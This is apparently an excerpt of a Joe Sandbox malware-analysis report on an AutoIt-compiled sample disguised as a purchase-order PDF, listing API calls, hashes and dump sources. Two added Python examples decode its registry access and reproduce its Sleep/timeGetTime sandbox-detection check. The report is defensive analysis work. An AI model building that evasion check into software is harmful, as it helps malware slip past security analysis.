• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: 0vH$4RH
• API String ID: 1143807570-2085553193
• Opcode ID: 4e9d22f23849f3857f7ef5f590f0c722d0218e828fe04b281823bbea8646989b
• Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
• Opcode Fuzzy Hash: 4e9d22f23849f3857f7ef5f590f0c722d0218e828fe04b281823bbea8646989b
• Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B

Control-flow Graph
control_flow_graph 1204 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1213 40e506-40e509 1204->1213 1214 42accc-42acd1 1204->1214 1217 40e540-40e555 call 40ee70 1213->1217 1218 40e50b-40e51c 1213->1218 1215 42acd3-42acdb 1214->1215 1216 42acdd-42ace0 1214->1216 1219 42ad12-42ad20 1215->1219 1220 42ace2-42aceb 1216->1220 1221 42aced-42acf0 1216->1221 1231 40e557-40e573 GetCurrentProcess call 40ee30 1217->1231 1232 40e579-40e5a8 1217->1232 1222 40e522-40e525 1218->1222 1223 42ac9b-42aca7 1218->1223 1230 42ad28-42ad2d GetSystemInfo 1219->1230 1220->1219 1221->1219 1228 42acf2-42ad06 1221->1228 1222->1217 1229 40e527-40e537 1222->1229 1226 42acb2-42acba 1223->1226 1227 42aca9-42acad 1223->1227 1226->1217 1227->1217 1233 42ad08-42ad0c 1228->1233 1234 42ad0e 1228->1234 1235 42acbf-42acc7 1229->1235 1236 40e53d 1229->1236 1238 42ad38-42ad3d GetSystemInfo 1230->1238 1231->1232 1245 40e575 1231->1245 1232->1238 1239 40e5ae-40e5c3 call 40eee0 1232->1239 1233->1219 1234->1219 1235->1217 1236->1217 1239->1230 1244 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1239->1244 1248 40e5e0-40e5ef 1244->1248 1249 40e5dd-40e5de FreeLibrary 1244->1249 1245->1232 1250 40e5f1-40e5f2 FreeLibrary 1248->1250 1251 40e5f4-40e5ff 1248->1251 1249->1248 1250->1251
APIs
• GetVersionExW.KERNEL32 ref: 0040E495
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
• GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
• FreeLibrary.KERNEL32(?), ref: 0040E5DE
• FreeLibrary.KERNEL32(?), ref: 0040E5F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
• String ID: pMH
• API String ID: 2923339712-2522892712
• Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
• Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
• Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
APIs
• LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsThemeActive$uxtheme.dll
• API String ID: 2574300362-3542929980
• Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
• Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
• Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
• Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28

Control-flow Graph

APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
• __wsplitpath.LIBCMT ref: 00410C61
  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
• _wcsncat.LIBCMT ref: 00410C78
• __wmakepath.LIBCMT ref: 00410C94
  • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
• _wcscpy.LIBCMT ref: 00410CCC
• RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
• RegQueryValueExW.ADVAPI32 ref: 00429BE4
• _wcscat.LIBCMT ref: 00429C43
• _wcslen.LIBCMT ref: 00429C55
• _wcslen.LIBCMT ref: 00429C66
• _wcscat.LIBCMT ref: 00429C80
• _wcsncpy.LIBCMT ref: 00429CC0
• RegCloseKey.ADVAPI32(?), ref: 00429CDE
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
• String ID: Include$Software\AutoIt v3\AutoIt$\
• API String ID: 1004883554-2276155026
• Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
• Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
• Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
• Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
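The APIs entry above is AutoIt runtime code: it takes its own module path, then opens HKCU\Software\AutoIt v3\AutoIt and reads the Include value to build an include directory. The raw arguments 80000001 and 00020019 are the root-key handle and the access mask. Since HKCU is writable by the unprivileged user, the directory this lookup returns is not a trusted location. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses API entries of this shape into records and decodes those two constants. HKEY_* and KEY_READ are the documented winreg.h values; the regular expression, the record layout and the describe_reg_open helper are this example's own choices, and the sample lines are copied from the listing above.

```python
# Added example (not from the report): parse Joe Sandbox "APIs" entries and decode the
# RegOpenKeyExW root key and access mask. Regex and record layout are assumptions.
import re
from typing import Dict, List, Optional

API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<subfn>[0-9A-Fa-f]{8}):\s*)?"   # nested call, if any
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_]+)"                # Function.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                                      # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"                       # call-site address
)

# Well-known winreg.h constants.
HKEY_NAMES = {
    0x80000000: "HKEY_CLASSES_ROOT",
    0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE",
    0x80000003: "HKEY_USERS",
}
KEY_READ = 0x20019        # STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY
KEY_WRITE = 0x20006       # STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | KEY_CREATE_SUB_KEY
KEY_ALL_ACCESS = 0xF003F
ACCESS_NAMES = {KEY_READ: "KEY_READ", KEY_WRITE: "KEY_WRITE", KEY_ALL_ACCESS: "KEY_ALL_ACCESS"}


def parse_api_line(line: str) -> Optional[Dict]:
    """One listing line -> record, or None for headers and other non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    args = m.group("args")
    return {
        "name": m.group("name"),
        "module": m.group("module"),
        "args": args.split(",") if args is not None else [],
        "ref": int(m.group("ref"), 16),
        "subcall_of": int(m.group("subfn"), 16) if m.group("subfn") else None,
    }


def parse_api_block(text: str) -> List[Dict]:
    """All API records in a block of listing text, in listing order."""
    return [r for r in (parse_api_line(l) for l in text.splitlines()) if r is not None]


def describe_reg_open(rec: Dict) -> str:
    """Render a RegOpenKeyExW record as ROOT\subkey plus a named access mask."""
    if rec["name"] != "RegOpenKeyExW" or len(rec["args"]) < 4:
        raise ValueError("expected RegOpenKeyExW with hKey, lpSubKey, ulOptions, samDesired")
    hkey = int(rec["args"][0], 16)
    sam = int(rec["args"][3], 16)
    root = HKEY_NAMES.get(hkey, f"0x{hkey:08X}")
    return f"{root}\\{rec['args'][1]} (access 0x{sam:08X} = {ACCESS_NAMES.get(sam, 'custom mask')})"


def registry_keys_opened(recs: List[Dict]) -> List[str]:
    """Every RegOpenKeyExW in the block, decoded; handy for a quick triage summary."""
    return [describe_reg_open(r) for r in recs if r["name"] == "RegOpenKeyExW"]


# Lines copied from the listing for the function at 00410C44..00429CDE.
SAMPLE = """\
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
• RegOpenKeyExW.KERNELBASE(80000001,Software\\AutoIt v3\\AutoIt,00000000,00020019,?), ref: 00410CE9
• RegQueryValueExW.ADVAPI32 ref: 00429BE4
• RegCloseKey.ADVAPI32(?), ref: 00429CDE
"""

if __name__ == "__main__":
    for rec in parse_api_block(SAMPLE):
        print(f"{rec['ref']:08X} {rec['module']}!{rec['name']} {rec['args']}")
    print(registry_keys_opened(parse_api_block(SAMPLE)))
```

Lines that are not API entries (section headers, hashes) are skipped rather than rejected, so a whole function entry can be fed in unchanged. Arguments are kept as the hex strings the report prints; a `?` means the sandbox could not recover the value.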
APIs
  • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
• Sleep.KERNEL32(0000000A), ref: 00409870
• timeGetTime.WINMM ref: 00409880
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: BuffCharSleepTimeUpper_wcslentime
• String ID:
• API String ID: 3219444185-0
• Opcode ID: 5ce5c73b473f4c1786c7b3a9dde6c4f3658cc2c253e02c8b8019e841656f04ca
• Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
• Opcode Fuzzy Hash: 5ce5c73b473f4c1786c7b3a9dde6c4f3658cc2c253e02c8b8019e841656f04ca
• Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
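The Sleep(0xA) at 00409870 followed by timeGetTime at 00409880 is the pattern behind the "detect sleep reduction / modifications" signature: the code sleeps 10 ms and reads a millisecond clock around it, so a sandbox that patches Sleep to return at once shows up as an impossibly short delay. The Python below is an added example, not code from the report or from the sample, and reproduces the check with time.sleep and time.monotonic_ns so it runs on any OS. The sample's exact comparison and threshold are not visible in the listing; the rule "elapsed shorter than requested minus a 2 ms slack" and the three sleep implementations are this example's assumptions. It goes one step further than the listing by also showing why a sandbox must advance the clock the sample reads, not merely skip the sleep.

```python
# Added example (not from the report): the Sleep()/timeGetTime() sleep-skip check with
# three sleep implementations a sample might encounter. Threshold and slack are assumptions.
import time
from typing import Callable


class Clock:
    """Stand-in for timeGetTime(): a monotonic clock plus an offset that a sandbox hook
    may add so that skipped sleeps still appear to have consumed time."""

    def __init__(self) -> None:
        self.offset_ns = 0

    def now_ns(self) -> int:
        return time.monotonic_ns() + self.offset_ns


def real_sleep(clock: Clock, ms: int) -> None:
    """Genuine delay, as kernel32!Sleep behaves on a real host."""
    time.sleep(ms / 1000.0)


def skipped_sleep(clock: Clock, ms: int) -> None:
    """Naive sandbox hook: Sleep returns immediately and the clock is left alone."""


def fast_forwarded_sleep(clock: Clock, ms: int) -> None:
    """Consistent sandbox hook: Sleep returns immediately but the clock the sample
    reads is advanced by the requested amount, so a before/after comparison
    sees the expected elapsed time."""
    clock.offset_ns += ms * 1_000_000


def sleep_was_skipped(do_sleep: Callable[[Clock, int], None], clock: Clock,
                      ms: int = 10, slack_ms: int = 2) -> bool:
    """Return True when the sleep took measurably less time, as read from `clock`,
    than requested. ms=10 mirrors the Sleep(0xA) in the listing; slack_ms absorbs
    timer granularity and is an assumption, not a value taken from the sample."""
    t0 = clock.now_ns()
    do_sleep(clock, ms)
    elapsed_ns = clock.now_ns() - t0
    return elapsed_ns < (ms - slack_ms) * 1_000_000


if __name__ == "__main__":
    for label, fn in (("real", real_sleep), ("skipped", skipped_sleep),
                      ("fast-forwarded", fast_forwarded_sleep)):
        print(f"{label:15s} skipped={sleep_was_skipped(fn, Clock())}")
```

The third case is the one that matters for sandbox operators: shortening Sleep without also moving every clock the sample can read (timeGetTime, GetTickCount, QueryPerformanceCounter, RDTSC) is exactly what this check is built to notice.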

Control-flow Graph

Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __fread_nolock$_fseek_wcscpy
• String ID: FILE
• API String ID: 3888824918-3121273764
• Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
• Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
• Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
• Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA

Control-flow Graph

APIs
• GetSysColorBrush.USER32 ref: 00410326
• RegisterClassExW.USER32 ref: 00410359
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
• InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
• LoadIconW.USER32(00400000,000000A9), ref: 004103B1
• ImageList_ReplaceIcon.COMCTL32(00C0DF98,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
• String ID: +$0$AutoIt v3 GUI$TaskbarCreated
• API String ID: 2914291525-1005189915
• Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
• Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
• Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
• Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 004101F9
• LoadCursorW.USER32(00000000,00007F00), ref: 00410209
• LoadIconW.USER32(?,00000063), ref: 0041021F
• LoadIconW.USER32(?,000000A4), ref: 00410232
• LoadIconW.USER32(?,000000A2), ref: 00410245
• LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
• RegisterClassExW.USER32 ref: 004102C6
  • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
  • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
  • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
  • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
  • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
  • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
  • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(00C0DF98,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$PGH
• API String ID: 423443420-3673556320
• Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
• Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
• Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
• Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99

                                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • _fseek.LIBCMT ref: 004525DA
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
• __fread_nolock.LIBCMT ref: 00452618
• __fread_nolock.LIBCMT ref: 00452629
• __fread_nolock.LIBCMT ref: 00452644
• __fread_nolock.LIBCMT ref: 00452661
• _fseek.LIBCMT ref: 0045267D
• _malloc.LIBCMT ref: 00452689
• _malloc.LIBCMT ref: 00452696
• __fread_nolock.LIBCMT ref: 004526A7
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __fread_nolock$_fseek_malloc_wcscpy
• String ID:
• API String ID: 1911931848-0
• Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
• Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
• Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A

Control-flow Graph (interactive graph not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: __fread_nolock_fseek_strcat
• String ID: AU3!$EA06
• API String ID: 3818483258-2658333250
• Opcode ID: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction ID: a326fe91d6bb541f17a8cee8b09d92be642ba4032c5aa5fe266a96c6f27d1a6c
• Opcode Fuzzy Hash: 61a815b4762265f9d00ad5303640aa958846bc8ab5516fbcebd88596bc1aced3
• Instruction Fuzzy Hash: 2B416C7160C340ABC331DA24C841AEB77A59B95308F68087EF5C597683E578E44A876B

Control-flow Graph (interactive graph not reproduced)
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
